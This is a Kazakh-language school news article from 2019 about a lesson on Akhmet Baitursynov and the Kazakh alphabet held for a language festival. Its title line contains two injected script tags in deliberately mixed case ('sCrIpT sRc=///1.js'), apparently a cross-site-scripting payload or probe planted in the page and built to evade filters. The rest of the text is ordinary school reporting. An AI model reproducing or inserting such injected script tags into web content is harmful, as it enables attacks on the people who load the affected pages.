«Дарабоз дарын иесі»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.09.2019
Қазақстан Республикасының тілдер мерекесіне арналған онкүндікте Ғ.Әбдірахманұлы атындағы Қима орта мектебінде арнайы жоспар құрастырылды. Осыған орай білім ошағымызда мереке төңірегінде түрлі іс-шаралар өткізілді.
9-сыныптың жетекшісі Муханжанова М.К. тілдер мерекесі аясында «Ахмет Байтұрсынов қазақ әліпбиінің негізін қалаушы» тақырыбында танымдық сабақ өткізді. Ірі ғалым-лингвист, әдебиет зерттеуші, тюрколог, дарынды ақын-аудармашы Ахмет Байтұрсынов қазақ халқы үшін еңбегі зор. Ахмет Байтұрсынов қазақша әліппе жасауы, араб жазуына кіргізген реформасы, қазақ тіл білімінің негізгі теминдерін жұртымыздың образды ойлау мүмкіндігімен сабақтастырып өз топырағымыздан тауып, оларға тұңғыш анықтама бергені, дыбыс жүйесін «фонетика», қалыптастырып шығарған еңбектері тіл біліміне қосқан үлесі екенін көруімізге болатыны жөнінде сынып жетекші кеңінен тоқталып өтті.
Сонымен қоса, Бөлтірік Ақнұр «Дәуірдің жарық жұлдызы» жайлы қосымша қызықты мәліметтер жинап, баяндама жазып келді.
А.Байтұрсынұлы бар уақытта, бар кезде де оқу керек деп кетті. Жазушының еңбектері қазақ үшін жасалған мәңгілік еңбектері бойынша «40 асық» сұрақ-жауап ойынымен сабақ өз мәресіне жетті. Оқушылар аталған сынып сабағынан өздеріне қажетті көптеген мәліметтерді алды деген сенімдемін.
Муханжанова М.К.